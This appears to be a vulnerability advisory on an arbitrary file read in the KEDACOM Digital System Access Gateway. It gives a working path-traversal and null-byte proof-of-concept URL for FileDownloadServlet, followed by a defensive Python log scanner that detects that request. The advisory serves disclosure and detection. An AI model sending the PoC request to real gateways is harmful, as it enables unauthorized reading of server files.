KEDACOM Digital System Access Gateway Arbitrary File Reading Vulnerability
Vulnerability Description
The KEDACOM Digital System Access Gateway contains an arbitrary file read vulnerability. An attacker can read any file on the server by constructing a request.
Vulnerability Impact
KEDACOM Digital System Access Gateway
Network surveying and mapping
Vulnerability Reproduction
The login page is as follows
Read /etc/hosts using the PoC:
/gatewayweb/FileDownloadServlet?fileName=test.txt&filePath=../../../../../../../../../../Windows/System32/drivers/etc/hosts%00.jpg&type=2
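For defenders, the request above has a recognizable shape in web access logs: the FileDownloadServlet path with a filePath value that contains ".." segments and a null byte once percent-decoded. The following Python check is an added example, not part of the original post or of any KEDACOM tooling; the combined access-log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/gatewayweb/FileDownloadServlet"  # path taken from the request on this page
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so multiply-encoded input is normalized too."""
    for _ in range(rounds):
        value, previous = unquote(value), value
        if value == previous:
            break
    return value

def suspicious_reasons(url):
    """Return why a request URL matches the file-read pattern; [] if it does not."""
    parts = urlsplit(url)
    if parts.path.lower() != ENDPOINT.lower():
        return []
    reasons = []
    for raw in parse_qs(parts.query, keep_blank_values=True).get("filePath", []):
        value = decode_fully(raw)  # parse_qs has already decoded once
        if ".." in re.split(r"[\\/]", value) and "traversal" not in reasons:
            reasons.append("traversal")
        if "\x00" in value and "null-byte" not in reasons:
            reasons.append("null-byte")
    return reasons

def scan(log_lines):
    """Return (line_number, reasons) for every log line that matches."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        reasons = suspicious_reasons(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits

# Constructed sample in combined log format (assumed); line 2 is the request shown above.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /gatewayweb/FileDownloadServlet'
    '?fileName=report.txt&filePath=upload/report.txt&type=2 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /gatewayweb/FileDownloadServlet'
    '?fileName=test.txt&filePath=../../../../../../../../../../Windows/System32/drivers'
    '/etc/hosts%00.jpg&type=2 HTTP/1.1" 200 824',
    '192.0.2.10 - - [01/Jan/2024:10:00:09 +0000] "GET /gatewayweb/ HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A 200 response to a flagged request is the case to triage first, since it indicates the gateway returned file content.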
This post is licensed under CC BY 4.0 by the author.